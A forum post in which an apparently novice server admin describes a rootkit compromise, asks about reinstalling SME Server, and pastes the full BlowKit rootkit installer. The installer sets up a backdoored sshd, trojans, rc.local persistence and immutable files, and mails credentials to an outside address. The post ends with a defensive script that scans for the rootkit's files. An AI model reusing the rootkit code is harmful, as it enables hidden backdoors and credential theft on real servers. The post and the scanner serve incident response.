I was hacked by my own stupid fault... I was too busy to update the old 5.5 server. Now I'm paying for it with days spent backing up, finding a second temporary backup server, etc...
How do I know it was hacked?
Well, the web server stopped running and when I tried to restart it, it kept failing. I checked the logs and noticed some promiscuous mode devices or something (apparently a sign of something bad - I don't know much about this stuff, mostly a Windows user, not a real admin)... I then was having a look through the file system and noticed some files in the tmp directory:
kit/
kit.tgz
SSLROOT.GZ
The kit directory contained the contents of the kit.tgz file - I moved the files off the server on to my own PC to have a closer look - turned out to be a rootkit called Blow Kit...
I'm not sure what it did to my server, and because of that, I'm figuring it's just best to back up my data and re-install a new version of SME.
contribs.org had been down until today, so I only now found out about 6.0.1
And this morning I just finished downloading the 330MB+ ISO of 6.0.0 over a 56K dial up connection (as well as the 6.0 update RPMs). Now that I've finished downloading that, contribs is back on-line and I notice people saying install 6.0.1!
DOH! I just spent nearly 3 days downloading 6.0.0 over my slow dial up connection... What do you recommend? Should I dump 6.0 and download 6.0.1 (another 2-3 days) and install 6.0.1 rather than 6.0?
What are the advantages/ disadvantages?
I've spent the whole day (so far) searching through the forums, but can't decide what to do... Are the latest 6.0 updates all I'll need?
By the way, here's the contents of the rootkit install file: (would this help in possibly reversing the damage it's done to the server without having to re-install?)
================
#!/bin/bash
BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
BLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m'
DGRN='[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'
unset HISTFILE
unset HISTSAVE
export HISTFILE=/dev/null
echo "${BLU} Welcome to BlowKit v2.0 (®mecanicus)"
if test -n "$1"; then
pass=$1
port=$2
mail=$3
else
echo "${BLU} ./install pass port mail "
echo "${WHI} Error..."
exit 0
fi
echo "${WHI} Freeing some resources and put some signs..."
echo "${WHI} |--------------------|100%"
pass=md5sum --string=$1 |awk -F ' ' ' {print $1} '
./touch /dev/.b
echo -n "${BLU} ."
killall &>/dev/null -9 awk
echo -n "${BLU}."
killall &>/dev/null -9 rm
echo -n "${BLU}."
killall &>/dev/null -9 mv
echo -n "${BLU}."
killall &>/dev/null -9 cp
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
if [ -f "/dev/.b" ]; then
echo "Only for your info : a sign result (read diagnostic)"
./touch diagnostic
echo this rk was instaled in the past on this server!>>diagnostic
else
echo -n ""
fi
echo "${RED} -Done-"
echo "${WHI} Next..."
echo ""
echo
echo "${WHI} Starting install sshd main backdoor"
echo "${WHI} |--------------------|100%"
./mv env /usr/bin/.env &>/dev/null
echo -n "${BLU} ."
echo -n "${BLU}."
/usr/bin/.env &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
./replace 62cadae65f54888f214aa0673003ab59 $pass hdaf4
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./replace 25000 $2 sshd_config
echo -n "${BLU}."
./mv hdaf4 /usr/sbin/ &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./mv sshd_config /usr/bin/000023 &>/dev/null
./cp .ham/* /usr/. &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI} Next..."
echo ""
echo "${WHI} Install some trojans!..."
echo "${WHI} |--------------------|100%"
echo -n "${BLU} ."
./mv blow /usr/bin/-bash &>/dev/null
/usr/sbin/hdaf4 -f /usr/bin/000023 -q
echo -n "${BLU}."
echo -n "${BLU}."
-bash &>/dev/null
echo -n "${BLU}."
./mkdir /usr/lib/.lib &>/dev/null
echo -n "${BLU}."
if [ -f "/usr/bin/gcc" ]; then
/usr/bin/gcc &>/dev/null -o netstatx2 netstatx.c
fi
if [ -f "netstatx2" ]; then
./rm &>/dev/null -rf netstatx
echo -n "${BLU}."
echo -n "${BLU}."
./mv netstatx2 netstatx &>/dev/null
fi
./cat > /usr/lib/.lib/libnh << EOF
60500
ircd
bash
ftp
under
ssh
33333
scan
6667
80.97
mycd
users
replace
install
.tmp
mec
X11f
.pid
25000
EOF
echo -n "${BLU}."
if [ -f "/etc/rc.d/rc.local" ]; then
echo "/usr/sbin/hdaf4 -f /usr/bin/000023 -q &>/dev/null">>/etc/rc.d/rc.local
echo ".env &>/dev/null">>/etc/rc.d/rc.local
echo "-bash &>/dev/null">>/etc/rc.d/rc.local
fi
./chattr &>/dev/null +isa /etc/rc.d/rc.local
echo -n "${BLU}."
./chattr &>/dev/null +isa /usr/bin/.env
./chattr &>/dev/null +isa /usr/bin/hdaf4
./chattr &>/dev/null +isa /bin/netstat
./chattr &>/dev/null +isa /usr/lib/.lib/libne
./chattr &>/dev/null +isa /usr/lib/.lib/libnh
./chattr &>/dev/null +isa /usr/bin/-bash
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI} Next..."
echo ""
echo "${WHI} Sending a mail..."
echo "${WHI} |--------------------|100%"
if test -n "$3"; then
echo "${RED}Sending mail to $3"
echo -n "${BLU} ."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./smail $1 $2 $3 | mail -s PuliKit burlac3l@yahoo.com
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./s &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
else
./s &>/dev/null
echo "${RED} No mail defined"
fi
echo "${RED} -Done-"
echo "${WHI} Next..."
echo ""
echo "${WHI} Killling mad active pids..."
killall &>/dev/null -9 mv
killall &>/dev/null -9 smail
killall &>/dev/null -9 mail
killall &>/dev/null -9 cp
killall &>/dev/null -9 rm
killall &>/dev/null -9 touch
killall &>/dev/null -9 cat
killall &>/dev/null -9 replace
killall &>/dev/null -9 awk
killall &>/dev/null -9 mkdir
killall &>/dev/null -9 crypt
killall &>/dev/null -9 chmod
killall &>/dev/null -9 ln
./chattr -iau ln
./chattr -iau install
cd ..
kit/rm -rf kit*
echo "${RED} -Done-"
echo "${WHI} Finished..."
=====================
I don't really understand what that code above does... but maybe someone here can shed some light on it all.
Thanks for any advice you could give me.
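As an added example (not from the original post or the rootkit's author): a small check script that looks for the files, start-up lines and immutable attributes the BlowKit installer above leaves on disk. Every path and pattern comes from that script; the only assumption is that the disk being checked is either the live system or an image mounted under the directory given as the first argument, so it can be run from a clean machine.

```shell
#!/bin/sh
# Added example, not part of the original post: look for the on-disk artefacts
# that the BlowKit install script above creates. Paths are taken from that
# script; $1 is the filesystem root to scan (default /), so a mounted image of
# the compromised disk can be checked offline from a clean machine.

# Files the installer drops or renames into place.
blowkit_paths() {
    printf '%s\n' /dev/.b /usr/bin/.env /usr/sbin/hdaf4 /usr/bin/000023 \
        /usr/bin/-bash /usr/lib/.lib/libnh /usr/lib/.lib/libne
}

# Print one FOUND: line per indicator under $1. Exit 0 if clean, 1 otherwise.
blowkit_scan() {
    root=${1:-/}; root=${root%/}
    found=0
    for p in $(blowkit_paths); do
        if [ -e "$root$p" ]; then
            echo "FOUND: $root$p"
            found=1
            # The installer runs chattr +isa on these, so rm fails until
            # the flags are cleared (chattr -ia); report that too.
            if command -v lsattr >/dev/null 2>&1 &&
               lsattr -d "$root$p" 2>/dev/null | grep -q '^[^ ]*i'; then
                echo "  (immutable attribute set; clear with chattr -ia first)"
            fi
        fi
    done
    # Persistence: the installer appends its three start-up lines to rc.local.
    rc="$root/etc/rc.d/rc.local"
    if [ -f "$rc" ] && grep -qE '^(/usr/sbin/hdaf4 |\.env |-bash )' "$rc"; then
        echo "FOUND: rootkit start-up lines in $rc"
        found=1
    fi
    return $found
}

# Number of FOUND: lines for $1 (0 means nothing matched).
blowkit_scan_count() {
    blowkit_scan "$1" | grep -c '^FOUND:' || true
}

# Usage: sh blowkit_check.sh /mnt/old-disk   (or / on the live system)
if [ $# -gt 0 ]; then
    blowkit_scan "$1"
fi
```

A clean result from this check only means these particular artefacts are absent; a rootkit that replaced system binaries (the script compiles its own netstat) cannot be trusted to report on itself, so a rebuild from known-good media is still the safe course.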